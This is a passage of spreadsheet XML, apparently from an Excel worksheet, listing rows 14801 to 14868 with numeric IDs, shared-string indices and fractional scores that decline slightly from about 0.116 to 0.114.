      <c r="C14801" s="2" t="s">
        <v>14269</v>
      </c>
      <c r="D14801" s="2">
        <v>1.0</v>
      </c>
      <c r="E14801" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14801" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="14802" ht="15.75" customHeight="1">
      <c r="A14802" s="1">
        <v>24346.0</v>
      </c>
      <c r="B14802" s="2">
        <v>1.0717699E7</v>
      </c>
      <c r="C14802" s="2" t="s">
        <v>14270</v>
      </c>
      <c r="D14802" s="2">
        <v>1.0</v>
      </c>
      <c r="E14802" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14802" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="14803" ht="15.75" customHeight="1">
      <c r="A14803" s="1">
        <v>24705.0</v>
      </c>
      <c r="B14803" s="2">
        <v>1.1657937E7</v>
      </c>
      <c r="C14803" s="2" t="s">
        <v>14271</v>
      </c>
      <c r="D14803" s="2">
        <v>1.0</v>
      </c>
      <c r="E14803" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14803" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="14804" ht="15.75" customHeight="1">
      <c r="A14804" s="1">
        <v>24789.0</v>
      </c>
      <c r="B14804" s="2">
        <v>1.19814E7</v>
      </c>
      <c r="C14804" s="2" t="s">
        <v>14272</v>
      </c>
      <c r="D14804" s="2">
        <v>1.0</v>
      </c>
      <c r="E14804" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14804" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="14805" ht="15.75" customHeight="1">
      <c r="A14805" s="1">
        <v>27455.0</v>
      </c>
      <c r="B14805" s="2">
        <v>2.1985098E7</v>
      </c>
      <c r="C14805" s="2" t="s">
        <v>14273</v>
      </c>
      <c r="D14805" s="2">
        <v>1.0</v>
      </c>
      <c r="E14805" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14805" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="14806" ht="15.75" customHeight="1">
      <c r="A14806" s="1">
        <v>29682.0</v>
      </c>
      <c r="B14806" s="2">
        <v>3.4051874E7</v>
      </c>
      <c r="C14806" s="2" t="s">
        <v>14274</v>
      </c>
      <c r="D14806" s="2">
        <v>1.0</v>
      </c>
      <c r="E14806" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14806" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="14807" ht="15.75" customHeight="1">
      <c r="A14807" s="1">
        <v>9695.0</v>
      </c>
      <c r="B14807" s="2">
        <v>5.6357008E7</v>
      </c>
      <c r="C14807" s="2" t="s">
        <v>14275</v>
      </c>
      <c r="D14807" s="2">
        <v>1.0</v>
      </c>
      <c r="E14807" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14807" s="2">
        <v>0.1162551440329218</v>
      </c>
    </row>
    <row r="14808" ht="15.75" customHeight="1">
      <c r="A14808" s="1">
        <v>10723.0</v>
      </c>
      <c r="B14808" s="2">
        <v>1.5138673E7</v>
      </c>
      <c r="C14808" s="2" t="s">
        <v>14276</v>
      </c>
      <c r="D14808" s="2">
        <v>1.0</v>
      </c>
      <c r="E14808" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14808" s="2">
        <v>0.1162551440329218</v>
      </c>
    </row>
    <row r="14809" ht="15.75" customHeight="1">
      <c r="A14809" s="1">
        <v>13772.0</v>
      </c>
      <c r="B14809" s="2">
        <v>3.6528626E7</v>
      </c>
      <c r="C14809" s="2" t="s">
        <v>14277</v>
      </c>
      <c r="D14809" s="2">
        <v>1.0</v>
      </c>
      <c r="E14809" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14809" s="2">
        <v>0.1162551440329218</v>
      </c>
    </row>
    <row r="14810" ht="15.75" customHeight="1">
      <c r="A14810" s="1">
        <v>18426.0</v>
      </c>
      <c r="B14810" s="2">
        <v>5.2716E7</v>
      </c>
      <c r="C14810" s="2" t="s">
        <v>14278</v>
      </c>
      <c r="D14810" s="2">
        <v>1.0</v>
      </c>
      <c r="E14810" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14810" s="2">
        <v>0.1162551440329218</v>
      </c>
    </row>
    <row r="14811" ht="15.75" customHeight="1">
      <c r="A14811" s="1">
        <v>2433.0</v>
      </c>
      <c r="B14811" s="2">
        <v>3.3621474E7</v>
      </c>
      <c r="C14811" s="2" t="s">
        <v>14279</v>
      </c>
      <c r="D14811" s="2">
        <v>1.0</v>
      </c>
      <c r="E14811" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14811" s="2">
        <v>0.1161616161616161</v>
      </c>
    </row>
    <row r="14812" ht="15.75" customHeight="1">
      <c r="A14812" s="1">
        <v>3930.0</v>
      </c>
      <c r="B14812" s="2">
        <v>4.0579494E7</v>
      </c>
      <c r="C14812" s="2" t="s">
        <v>14280</v>
      </c>
      <c r="D14812" s="2">
        <v>1.0</v>
      </c>
      <c r="E14812" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14812" s="2">
        <v>0.1161616161616161</v>
      </c>
    </row>
    <row r="14813" ht="15.75" customHeight="1">
      <c r="A14813" s="1">
        <v>16638.0</v>
      </c>
      <c r="B14813" s="2">
        <v>4.7121642E7</v>
      </c>
      <c r="C14813" s="2" t="s">
        <v>14281</v>
      </c>
      <c r="D14813" s="2">
        <v>1.0</v>
      </c>
      <c r="E14813" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14813" s="2">
        <v>0.1161616161616161</v>
      </c>
    </row>
    <row r="14814" ht="15.75" customHeight="1">
      <c r="A14814" s="1">
        <v>19176.0</v>
      </c>
      <c r="B14814" s="2">
        <v>5.4972328E7</v>
      </c>
      <c r="C14814" s="2" t="s">
        <v>14282</v>
      </c>
      <c r="D14814" s="2">
        <v>1.0</v>
      </c>
      <c r="E14814" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14814" s="2">
        <v>0.1161616161616161</v>
      </c>
    </row>
    <row r="14815" ht="15.75" customHeight="1">
      <c r="A14815" s="1">
        <v>1090.0</v>
      </c>
      <c r="B14815" s="2">
        <v>2.3769819E7</v>
      </c>
      <c r="C14815" s="2" t="s">
        <v>14283</v>
      </c>
      <c r="D14815" s="2">
        <v>1.0</v>
      </c>
      <c r="E14815" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14815" s="2">
        <v>0.1160714285714286</v>
      </c>
    </row>
    <row r="14816" ht="15.75" customHeight="1">
      <c r="A14816" s="1">
        <v>4057.0</v>
      </c>
      <c r="B14816" s="2">
        <v>4.1129371E7</v>
      </c>
      <c r="C14816" s="2" t="s">
        <v>14284</v>
      </c>
      <c r="D14816" s="2">
        <v>1.0</v>
      </c>
      <c r="E14816" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14816" s="2">
        <v>0.1160714285714286</v>
      </c>
    </row>
    <row r="14817" ht="15.75" customHeight="1">
      <c r="A14817" s="1">
        <v>11328.0</v>
      </c>
      <c r="B14817" s="2">
        <v>2.1093789E7</v>
      </c>
      <c r="C14817" s="2" t="s">
        <v>14285</v>
      </c>
      <c r="D14817" s="2">
        <v>1.0</v>
      </c>
      <c r="E14817" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14817" s="2">
        <v>0.1160714285714286</v>
      </c>
    </row>
    <row r="14818" ht="15.75" customHeight="1">
      <c r="A14818" s="1">
        <v>19217.0</v>
      </c>
      <c r="B14818" s="2">
        <v>5.4998183E7</v>
      </c>
      <c r="C14818" s="2" t="s">
        <v>14286</v>
      </c>
      <c r="D14818" s="2">
        <v>1.0</v>
      </c>
      <c r="E14818" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14818" s="2">
        <v>0.1160714285714286</v>
      </c>
    </row>
    <row r="14819" ht="15.75" customHeight="1">
      <c r="A14819" s="1">
        <v>22688.0</v>
      </c>
      <c r="B14819" s="2">
        <v>4.2225185E7</v>
      </c>
      <c r="C14819" s="2" t="s">
        <v>14215</v>
      </c>
      <c r="D14819" s="2">
        <v>1.0</v>
      </c>
      <c r="E14819" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14819" s="2">
        <v>0.1160714285714286</v>
      </c>
    </row>
    <row r="14820" ht="15.75" customHeight="1">
      <c r="A14820" s="1">
        <v>23361.0</v>
      </c>
      <c r="B14820" s="2">
        <v>5.5086567E7</v>
      </c>
      <c r="C14820" s="2" t="s">
        <v>14024</v>
      </c>
      <c r="D14820" s="2">
        <v>1.0</v>
      </c>
      <c r="E14820" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14820" s="2">
        <v>0.1160714285714286</v>
      </c>
    </row>
    <row r="14821" ht="15.75" customHeight="1">
      <c r="A14821" s="1">
        <v>16028.0</v>
      </c>
      <c r="B14821" s="2">
        <v>4.510024E7</v>
      </c>
      <c r="C14821" s="2" t="s">
        <v>14287</v>
      </c>
      <c r="D14821" s="2">
        <v>1.0</v>
      </c>
      <c r="E14821" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14821" s="2">
        <v>0.1160714285714285</v>
      </c>
    </row>
    <row r="14822" ht="15.75" customHeight="1">
      <c r="A14822" s="1">
        <v>18091.0</v>
      </c>
      <c r="B14822" s="2">
        <v>5.168695E7</v>
      </c>
      <c r="C14822" s="2" t="s">
        <v>14288</v>
      </c>
      <c r="D14822" s="2">
        <v>1.0</v>
      </c>
      <c r="E14822" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14822" s="2">
        <v>0.1159844054580897</v>
      </c>
    </row>
    <row r="14823" ht="15.75" customHeight="1">
      <c r="A14823" s="1">
        <v>26658.0</v>
      </c>
      <c r="B14823" s="2">
        <v>1.8059799E7</v>
      </c>
      <c r="C14823" s="2" t="s">
        <v>14289</v>
      </c>
      <c r="D14823" s="2">
        <v>1.0</v>
      </c>
      <c r="E14823" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14823" s="2">
        <v>0.1159844054580897</v>
      </c>
    </row>
    <row r="14824" ht="15.75" customHeight="1">
      <c r="A14824" s="1">
        <v>33273.0</v>
      </c>
      <c r="B14824" s="2">
        <v>7411633.0</v>
      </c>
      <c r="C14824" s="2" t="s">
        <v>14290</v>
      </c>
      <c r="D14824" s="2">
        <v>1.0</v>
      </c>
      <c r="E14824" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14824" s="2">
        <v>0.1159844054580897</v>
      </c>
    </row>
    <row r="14825" ht="15.75" customHeight="1">
      <c r="A14825" s="1">
        <v>17682.0</v>
      </c>
      <c r="B14825" s="2">
        <v>5.0496741E7</v>
      </c>
      <c r="C14825" s="2" t="s">
        <v>14291</v>
      </c>
      <c r="D14825" s="2">
        <v>1.0</v>
      </c>
      <c r="E14825" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14825" s="2">
        <v>0.1159003831417625</v>
      </c>
    </row>
    <row r="14826" ht="15.75" customHeight="1">
      <c r="A14826" s="1">
        <v>4345.0</v>
      </c>
      <c r="B14826" s="2">
        <v>4.2081154E7</v>
      </c>
      <c r="C14826" s="2" t="s">
        <v>14292</v>
      </c>
      <c r="D14826" s="2">
        <v>1.0</v>
      </c>
      <c r="E14826" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14826" s="2">
        <v>0.1159003831417624</v>
      </c>
    </row>
    <row r="14827" ht="15.75" customHeight="1">
      <c r="A14827" s="1">
        <v>5953.0</v>
      </c>
      <c r="B14827" s="2">
        <v>4.7285679E7</v>
      </c>
      <c r="C14827" s="2" t="s">
        <v>14293</v>
      </c>
      <c r="D14827" s="2">
        <v>1.0</v>
      </c>
      <c r="E14827" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14827" s="2">
        <v>0.1159003831417624</v>
      </c>
    </row>
    <row r="14828" ht="15.75" customHeight="1">
      <c r="A14828" s="1">
        <v>10724.0</v>
      </c>
      <c r="B14828" s="2">
        <v>1.5150969E7</v>
      </c>
      <c r="C14828" s="2" t="s">
        <v>14294</v>
      </c>
      <c r="D14828" s="2">
        <v>1.0</v>
      </c>
      <c r="E14828" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14828" s="2">
        <v>0.1159003831417624</v>
      </c>
    </row>
    <row r="14829" ht="15.75" customHeight="1">
      <c r="A14829" s="1">
        <v>12528.0</v>
      </c>
      <c r="B14829" s="2">
        <v>2.9757211E7</v>
      </c>
      <c r="C14829" s="2" t="s">
        <v>14295</v>
      </c>
      <c r="D14829" s="2">
        <v>1.0</v>
      </c>
      <c r="E14829" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14829" s="2">
        <v>0.1159003831417624</v>
      </c>
    </row>
    <row r="14830" ht="15.75" customHeight="1">
      <c r="A14830" s="1">
        <v>13888.0</v>
      </c>
      <c r="B14830" s="2">
        <v>3.7018421E7</v>
      </c>
      <c r="C14830" s="2" t="s">
        <v>14296</v>
      </c>
      <c r="D14830" s="2">
        <v>1.0</v>
      </c>
      <c r="E14830" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14830" s="2">
        <v>0.1159003831417624</v>
      </c>
    </row>
    <row r="14831" ht="15.75" customHeight="1">
      <c r="A14831" s="1">
        <v>14229.0</v>
      </c>
      <c r="B14831" s="2">
        <v>3.8300168E7</v>
      </c>
      <c r="C14831" s="2" t="s">
        <v>14297</v>
      </c>
      <c r="D14831" s="2">
        <v>1.0</v>
      </c>
      <c r="E14831" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14831" s="2">
        <v>0.1159003831417624</v>
      </c>
    </row>
    <row r="14832" ht="15.75" customHeight="1">
      <c r="A14832" s="1">
        <v>14634.0</v>
      </c>
      <c r="B14832" s="2">
        <v>4.0318239E7</v>
      </c>
      <c r="C14832" s="2" t="s">
        <v>14298</v>
      </c>
      <c r="D14832" s="2">
        <v>1.0</v>
      </c>
      <c r="E14832" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14832" s="2">
        <v>0.1159003831417624</v>
      </c>
    </row>
    <row r="14833" ht="15.75" customHeight="1">
      <c r="A14833" s="1">
        <v>19085.0</v>
      </c>
      <c r="B14833" s="2">
        <v>5.4657252E7</v>
      </c>
      <c r="C14833" s="2" t="s">
        <v>14299</v>
      </c>
      <c r="D14833" s="2">
        <v>1.0</v>
      </c>
      <c r="E14833" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14833" s="2">
        <v>0.1159003831417624</v>
      </c>
    </row>
    <row r="14834" ht="15.75" customHeight="1">
      <c r="A14834" s="1">
        <v>19763.0</v>
      </c>
      <c r="B14834" s="2">
        <v>5.6735527E7</v>
      </c>
      <c r="C14834" s="2" t="s">
        <v>14300</v>
      </c>
      <c r="D14834" s="2">
        <v>1.0</v>
      </c>
      <c r="E14834" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14834" s="2">
        <v>0.1159003831417624</v>
      </c>
    </row>
    <row r="14835" ht="15.75" customHeight="1">
      <c r="A14835" s="1">
        <v>1690.0</v>
      </c>
      <c r="B14835" s="2">
        <v>2.8466059E7</v>
      </c>
      <c r="C14835" s="2" t="s">
        <v>14301</v>
      </c>
      <c r="D14835" s="2">
        <v>1.0</v>
      </c>
      <c r="E14835" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14835" s="2">
        <v>0.115819209039548</v>
      </c>
    </row>
    <row r="14836" ht="15.75" customHeight="1">
      <c r="A14836" s="1">
        <v>2915.0</v>
      </c>
      <c r="B14836" s="2">
        <v>3.5832452E7</v>
      </c>
      <c r="C14836" s="2" t="s">
        <v>14302</v>
      </c>
      <c r="D14836" s="2">
        <v>1.0</v>
      </c>
      <c r="E14836" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14836" s="2">
        <v>0.115819209039548</v>
      </c>
    </row>
    <row r="14837" ht="15.75" customHeight="1">
      <c r="A14837" s="1">
        <v>27317.0</v>
      </c>
      <c r="B14837" s="2">
        <v>2.137679E7</v>
      </c>
      <c r="C14837" s="2" t="s">
        <v>14303</v>
      </c>
      <c r="D14837" s="2">
        <v>1.0</v>
      </c>
      <c r="E14837" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14837" s="2">
        <v>0.115819209039548</v>
      </c>
    </row>
    <row r="14838" ht="15.75" customHeight="1">
      <c r="A14838" s="1">
        <v>32706.0</v>
      </c>
      <c r="B14838" s="2">
        <v>5953884.0</v>
      </c>
      <c r="C14838" s="2" t="s">
        <v>14304</v>
      </c>
      <c r="D14838" s="2">
        <v>1.0</v>
      </c>
      <c r="E14838" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14838" s="2">
        <v>0.115819209039548</v>
      </c>
    </row>
    <row r="14839" ht="15.75" customHeight="1">
      <c r="A14839" s="1">
        <v>11682.0</v>
      </c>
      <c r="B14839" s="2">
        <v>2.3444499E7</v>
      </c>
      <c r="C14839" s="2" t="s">
        <v>14305</v>
      </c>
      <c r="D14839" s="2">
        <v>1.0</v>
      </c>
      <c r="E14839" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14839" s="2">
        <v>0.1157407407407407</v>
      </c>
    </row>
    <row r="14840" ht="15.75" customHeight="1">
      <c r="A14840" s="1">
        <v>17724.0</v>
      </c>
      <c r="B14840" s="2">
        <v>5.0627166E7</v>
      </c>
      <c r="C14840" s="2" t="s">
        <v>14306</v>
      </c>
      <c r="D14840" s="2">
        <v>1.0</v>
      </c>
      <c r="E14840" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14840" s="2">
        <v>0.1157407407407407</v>
      </c>
    </row>
    <row r="14841" ht="15.75" customHeight="1">
      <c r="A14841" s="1">
        <v>29899.0</v>
      </c>
      <c r="B14841" s="2">
        <v>3607018.0</v>
      </c>
      <c r="C14841" s="2" t="s">
        <v>14307</v>
      </c>
      <c r="D14841" s="2">
        <v>1.0</v>
      </c>
      <c r="E14841" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14841" s="2">
        <v>0.1157407407407407</v>
      </c>
    </row>
    <row r="14842" ht="15.75" customHeight="1">
      <c r="A14842" s="1">
        <v>2729.0</v>
      </c>
      <c r="B14842" s="2">
        <v>3.4982938E7</v>
      </c>
      <c r="C14842" s="2" t="s">
        <v>14308</v>
      </c>
      <c r="D14842" s="2">
        <v>1.0</v>
      </c>
      <c r="E14842" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14842" s="2">
        <v>0.1156648451730419</v>
      </c>
    </row>
    <row r="14843" ht="15.75" customHeight="1">
      <c r="A14843" s="1">
        <v>9606.0</v>
      </c>
      <c r="B14843" s="2">
        <v>5.6158153E7</v>
      </c>
      <c r="C14843" s="2" t="s">
        <v>14309</v>
      </c>
      <c r="D14843" s="2">
        <v>1.0</v>
      </c>
      <c r="E14843" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14843" s="2">
        <v>0.1156648451730419</v>
      </c>
    </row>
    <row r="14844" ht="15.75" customHeight="1">
      <c r="A14844" s="1">
        <v>10677.0</v>
      </c>
      <c r="B14844" s="2">
        <v>1.4547761E7</v>
      </c>
      <c r="C14844" s="2" t="s">
        <v>14310</v>
      </c>
      <c r="D14844" s="2">
        <v>1.0</v>
      </c>
      <c r="E14844" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14844" s="2">
        <v>0.1156648451730419</v>
      </c>
    </row>
    <row r="14845" ht="15.75" customHeight="1">
      <c r="A14845" s="1">
        <v>26684.0</v>
      </c>
      <c r="B14845" s="2">
        <v>1.8107031E7</v>
      </c>
      <c r="C14845" s="2" t="s">
        <v>14311</v>
      </c>
      <c r="D14845" s="2">
        <v>1.0</v>
      </c>
      <c r="E14845" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14845" s="2">
        <v>0.1156648451730419</v>
      </c>
    </row>
    <row r="14846" ht="15.75" customHeight="1">
      <c r="A14846" s="1">
        <v>32606.0</v>
      </c>
      <c r="B14846" s="2">
        <v>5825176.0</v>
      </c>
      <c r="C14846" s="2" t="s">
        <v>14312</v>
      </c>
      <c r="D14846" s="2">
        <v>1.0</v>
      </c>
      <c r="E14846" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14846" s="2">
        <v>0.1156648451730419</v>
      </c>
    </row>
    <row r="14847" ht="15.75" customHeight="1">
      <c r="A14847" s="1">
        <v>3224.0</v>
      </c>
      <c r="B14847" s="2">
        <v>3.7326616E7</v>
      </c>
      <c r="C14847" s="2" t="s">
        <v>14313</v>
      </c>
      <c r="D14847" s="2">
        <v>1.0</v>
      </c>
      <c r="E14847" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14847" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="14848" ht="15.75" customHeight="1">
      <c r="A14848" s="1">
        <v>8607.0</v>
      </c>
      <c r="B14848" s="2">
        <v>5.4267144E7</v>
      </c>
      <c r="C14848" s="2" t="s">
        <v>14314</v>
      </c>
      <c r="D14848" s="2">
        <v>1.0</v>
      </c>
      <c r="E14848" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14848" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="14849" ht="15.75" customHeight="1">
      <c r="A14849" s="1">
        <v>27746.0</v>
      </c>
      <c r="B14849" s="2">
        <v>2.3082384E7</v>
      </c>
      <c r="C14849" s="2" t="s">
        <v>14315</v>
      </c>
      <c r="D14849" s="2">
        <v>1.0</v>
      </c>
      <c r="E14849" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14849" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="14850" ht="15.75" customHeight="1">
      <c r="A14850" s="1">
        <v>29011.0</v>
      </c>
      <c r="B14850" s="2">
        <v>2.9975852E7</v>
      </c>
      <c r="C14850" s="2" t="s">
        <v>14316</v>
      </c>
      <c r="D14850" s="2">
        <v>1.0</v>
      </c>
      <c r="E14850" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14850" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="14851" ht="15.75" customHeight="1">
      <c r="A14851" s="1">
        <v>32596.0</v>
      </c>
      <c r="B14851" s="2">
        <v>5803434.0</v>
      </c>
      <c r="C14851" s="2" t="s">
        <v>14317</v>
      </c>
      <c r="D14851" s="2">
        <v>1.0</v>
      </c>
      <c r="E14851" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14851" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="14852" ht="15.75" customHeight="1">
      <c r="A14852" s="1">
        <v>2762.0</v>
      </c>
      <c r="B14852" s="2">
        <v>3.5106904E7</v>
      </c>
      <c r="C14852" s="2" t="s">
        <v>14318</v>
      </c>
      <c r="D14852" s="2">
        <v>1.0</v>
      </c>
      <c r="E14852" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14852" s="2">
        <v>0.1155202821869488</v>
      </c>
    </row>
    <row r="14853" ht="15.75" customHeight="1">
      <c r="A14853" s="1">
        <v>2418.0</v>
      </c>
      <c r="B14853" s="2">
        <v>3.3524258E7</v>
      </c>
      <c r="C14853" s="2" t="s">
        <v>14319</v>
      </c>
      <c r="D14853" s="2">
        <v>1.0</v>
      </c>
      <c r="E14853" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14853" s="2">
        <v>0.1154513888888889</v>
      </c>
    </row>
    <row r="14854" ht="15.75" customHeight="1">
      <c r="A14854" s="1">
        <v>10065.0</v>
      </c>
      <c r="B14854" s="2">
        <v>5.7138804E7</v>
      </c>
      <c r="C14854" s="2" t="s">
        <v>14320</v>
      </c>
      <c r="D14854" s="2">
        <v>1.0</v>
      </c>
      <c r="E14854" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14854" s="2">
        <v>0.1154513888888889</v>
      </c>
    </row>
    <row r="14855" ht="15.75" customHeight="1">
      <c r="A14855" s="1">
        <v>879.0</v>
      </c>
      <c r="B14855" s="2">
        <v>2.1934627E7</v>
      </c>
      <c r="C14855" s="2" t="s">
        <v>14321</v>
      </c>
      <c r="D14855" s="2">
        <v>1.0</v>
      </c>
      <c r="E14855" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14855" s="2">
        <v>0.1143162393162393</v>
      </c>
    </row>
    <row r="14856" ht="15.75" customHeight="1">
      <c r="A14856" s="1">
        <v>11654.0</v>
      </c>
      <c r="B14856" s="2">
        <v>2.3316379E7</v>
      </c>
      <c r="C14856" s="2" t="s">
        <v>14322</v>
      </c>
      <c r="D14856" s="2">
        <v>1.0</v>
      </c>
      <c r="E14856" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14856" s="2">
        <v>0.1143162393162393</v>
      </c>
    </row>
    <row r="14857" ht="15.75" customHeight="1">
      <c r="A14857" s="1">
        <v>12019.0</v>
      </c>
      <c r="B14857" s="2">
        <v>2.6051383E7</v>
      </c>
      <c r="C14857" s="2" t="s">
        <v>14323</v>
      </c>
      <c r="D14857" s="2">
        <v>1.0</v>
      </c>
      <c r="E14857" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14857" s="2">
        <v>0.1143162393162393</v>
      </c>
    </row>
    <row r="14858" ht="15.75" customHeight="1">
      <c r="A14858" s="1">
        <v>3620.0</v>
      </c>
      <c r="B14858" s="2">
        <v>3.9189065E7</v>
      </c>
      <c r="C14858" s="2" t="s">
        <v>14324</v>
      </c>
      <c r="D14858" s="2">
        <v>1.0</v>
      </c>
      <c r="E14858" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14858" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="14859" ht="15.75" customHeight="1">
      <c r="A14859" s="1">
        <v>3746.0</v>
      </c>
      <c r="B14859" s="2">
        <v>3.9689362E7</v>
      </c>
      <c r="C14859" s="2" t="s">
        <v>14325</v>
      </c>
      <c r="D14859" s="2">
        <v>1.0</v>
      </c>
      <c r="E14859" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14859" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="14860" ht="15.75" customHeight="1">
      <c r="A14860" s="1">
        <v>4180.0</v>
      </c>
      <c r="B14860" s="2">
        <v>4.1560437E7</v>
      </c>
      <c r="C14860" s="2" t="s">
        <v>14326</v>
      </c>
      <c r="D14860" s="2">
        <v>1.0</v>
      </c>
      <c r="E14860" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14860" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="14861" ht="15.75" customHeight="1">
      <c r="A14861" s="1">
        <v>6214.0</v>
      </c>
      <c r="B14861" s="2">
        <v>4.8009701E7</v>
      </c>
      <c r="C14861" s="2" t="s">
        <v>14327</v>
      </c>
      <c r="D14861" s="2">
        <v>1.0</v>
      </c>
      <c r="E14861" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14861" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="14862" ht="15.75" customHeight="1">
      <c r="A14862" s="1">
        <v>8472.0</v>
      </c>
      <c r="B14862" s="2">
        <v>5.4015257E7</v>
      </c>
      <c r="C14862" s="2" t="s">
        <v>14328</v>
      </c>
      <c r="D14862" s="2">
        <v>1.0</v>
      </c>
      <c r="E14862" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14862" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="14863" ht="15.75" customHeight="1">
      <c r="A14863" s="1">
        <v>12657.0</v>
      </c>
      <c r="B14863" s="2">
        <v>3.0460847E7</v>
      </c>
      <c r="C14863" s="2" t="s">
        <v>14329</v>
      </c>
      <c r="D14863" s="2">
        <v>1.0</v>
      </c>
      <c r="E14863" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14863" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="14864" ht="15.75" customHeight="1">
      <c r="A14864" s="1">
        <v>12965.0</v>
      </c>
      <c r="B14864" s="2">
        <v>3.2520089E7</v>
      </c>
      <c r="C14864" s="2" t="s">
        <v>14330</v>
      </c>
      <c r="D14864" s="2">
        <v>1.0</v>
      </c>
      <c r="E14864" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14864" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="14865" ht="15.75" customHeight="1">
      <c r="A14865" s="1">
        <v>17156.0</v>
      </c>
      <c r="B14865" s="2">
        <v>4.8868162E7</v>
      </c>
      <c r="C14865" s="2" t="s">
        <v>14331</v>
      </c>
      <c r="D14865" s="2">
        <v>1.0</v>
      </c>
      <c r="E14865" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14865" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="14866" ht="15.75" customHeight="1">
      <c r="A14866" s="1">
        <v>19709.0</v>
      </c>
      <c r="B14866" s="2">
        <v>5.6538503E7</v>
      </c>
      <c r="C14866" s="2" t="s">
        <v>14332</v>
      </c>
      <c r="D14866" s="2">
        <v>1.0</v>
      </c>
      <c r="E14866" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14866" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="14867" ht="15.75" customHeight="1">
      <c r="A14867" s="1">
        <v>25485.0</v>
      </c>
      <c r="B14867" s="2">
        <v>1.4028153E7</v>
      </c>
      <c r="C14867" s="2" t="s">
        <v>14333</v>
      </c>
      <c r="D14867" s="2">
        <v>1.0</v>
      </c>
      <c r="E14867" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14867" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="14868" ht="15.75" customHeight="1">
      <c r="A14868" s="1">
        <v>33457.0</v>
      </c>
      <c r="B14868" s="2">
        <v>7895341.0</v>
      </c>
